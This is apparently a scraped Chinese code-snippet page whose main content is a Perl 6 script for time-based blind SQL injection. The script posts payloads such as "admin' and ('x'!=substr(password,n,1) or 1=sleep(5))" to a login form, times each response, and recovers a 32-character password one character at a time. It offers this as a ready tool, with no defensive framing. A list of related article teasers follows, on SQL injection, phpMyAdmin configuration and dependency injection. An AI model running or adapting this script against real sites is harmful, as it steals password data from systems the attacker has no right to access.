perl6 一个猜测密码的注入

use HTTP::UserAgent;

my $ua = HTTP::UserAgent.new;
my $r = HTTP::Request.new;
my $c = HTTP::Cookies.new;
$c.set-cookie(‘Set-Cookie:JSESSIONID=06617AD9F324C7D49D3218D800B8FBB6‘);
my $url = ‘http://target/login.do‘;
$r.uri: $url;
$r.set-method: ‘POST‘;
$r.add-cookies($c);

$r.header.field(:user-agent<Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0>);
my %data = :loginName<inject>,:password<admin>,:vcode<vzhc>;

my @a = 0..9;
my @swap = ‘a‘..‘z‘;
@a.append(@swap);
my @password;
for 1..32 {
  for @a -> $char {
    %data<loginName>="admin‘ and (\‘$char\‘!=substr(password,$_,1) or 1=sleep(5)) and ‘‘=‘";
    $r.add-form-data(%data);
    my $stime = time;
    my $result = $ua.request($r);
    my $endtime = time;
    my $finish_time = $endtime-$stime;
    if ($finish_time >= 5) {
      say $char;
      @password.append($char);
      say ‘password-> ‘~@password.join(‘‘);
      last;
    }
  }
}
say @password.join(‘‘);

时间： 2024-10-21 16:42:03

perl6 一个猜测密码的注入的相关文章

一个PHP的SQL注入完整过程

本篇文章介绍的内容是一个PHP的SQL注入完整过程,现在分享给大家,有需要的朋友可以参考一下希望帮助到大家,很多PHPer在进阶的时候总会遇到一些问题和瓶颈,业务代码写多了没有方向感,不知道该从那里入手去提升,对此我整理了一些资料,包括但不限于:分布式架构.高可扩展.高性能.高并发.服务器性能调优.TP6,laravel,YII2,Redis,Swoole.Swoft.Kafka.Mysql优化.shell脚本.Docker.微服务.Nginx等多个知识点高级进阶干货需要的可以免费分享给大家,

PhpMyAdmin配置文件现在需要一个短语密码

在登录phpmyadmin管理数据库,会出现“配置文件现在需要一个短语密码”的警告解决方法: 打开目录phpmyadmin/libraries中的config.default.php文件查找下面这行:$cfg['blowfish_secret'] = '这里就是需要的短语密码';(短语密码请随意填写) 比如修改为:$cfg['blowfish_secret'] = 'cookiess' 查找:$cfg['Servers'][$i]['auth_type'] = ‘cookie’ #后面的值

从c#角度看万能密码SQL注入漏洞

以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞,大家相信很熟悉了. 不懂得简单了解下,懂的大牛直接飘过即可. ***************************************************************************** 当我们用御剑之类的扫描器扫描到某些有这个万能密码SQL注入的漏洞网站后台后, 打开

phpMyAdmin 配置文件现在需要一个短语密码的

登陆phpMyAdmin时,在页面下方提示:“配置文件现在需要一个短语密码.” 这表示需要在配置文件设置一个Cookies的密码,防止Cookies混乱. /** * The 'cookie' auth_type uses AES algorithm to encrypt the password. If * at least one server configuration uses 'cookie' auth_type, enter here a * pass phrase that wil

PhpMyAdmin 配置文件现在需要一个短语密码的解决方法

本文主要介绍PhpMyAdmin 配置文件现在需要一个短语密码的解决方法,比较实用,希望能给大家做一个参考. 新版本的PhpMyAdmin 增强了安全性,需要在配置文件设置一个短语密码.否则进入之后会有“配置文件现在需要一个短语密码.”的红色警叹提示. 解决方法: 1.将 phpMyAdmin/libraries/config.default.php中的 $cfg['blowfish_secret'] = ''; 改成 $cfg['blowfish_secret'] = '123456'; (注

动手造轮子：实现一个简单的依赖注入(一)

动手造轮子:实现一个简单的依赖注入(一) Intro 在上一篇文章中主要介绍了一下要做的依赖注入的整体设计和大概编程体验,这篇文章要开始写代码了,开始实现自己的依赖注入框架. 类图首先来温习一下上次提到的类图服务生命周期服务生命周期定义: public enum ServiceLifetime : sbyte { /// <summary> /// Specifies that a single instance of the service will be created. /// &

一个不用密码的用户系统

很多年前云风设想过这样一个用户系统<为什么一定要有密码?>,我是挺赞同的.对我来说,用户系统是一个责任重大的东西,可惜很多国内厂商都不把这当回事. 之前做过一些小东西,基本上都是采用第三方登录的方式,比如用google账号登录.这样就把用户管理的麻烦事交给第三方去处理了,相信google这样的大厂能做得更好. 然而总会有需要自己管理用户的时候,虽然可以采用各种安全的措施去保护这些用户数据,比如用更安全的密码散列算法什么的,但最好还是不要有密码,没有密码就无从泄露了. 之所以有这种想法,是站在用

用nodejs做一个svn密码修改页面

linux上配置好svn后,管理修改密码还得去手工修改passwd这个文件,太麻烦,其实网上应该有配套的web管理修改界面.但我想自己用nodejs写一个,因为用node不用配置复杂的服务器. 弄这种基于事件模型的语言,一定要小心,整个过程可能不是线性的. 1 var http = require("http"); 2 var fs = require('fs'); 3 var url = require('url'); 4 var query = require('querystri

使用jQuery开发一个带有密码强度检验的超酷注册页面

在今天的jQuery教程中,我们将介绍如何使用jQuery和其它相关的插件来生成一个漂亮的带有密码强度检验的注册页面,希望大家喜欢! 相关的插件和类库 complexify - 一个密码强度检验jQuery插件 justgage - 一个兼容性良好的仪表盘类库主要功能注册中包含一个密码强度检验组件,用户需要设置一定强度的密码才可以注册密码强度使用仪表盘类库justgage来显示,不同的强度的密码将显示不同的颜色密码强度符合要求后,显示注册按钮代码说明 HTML: <div id="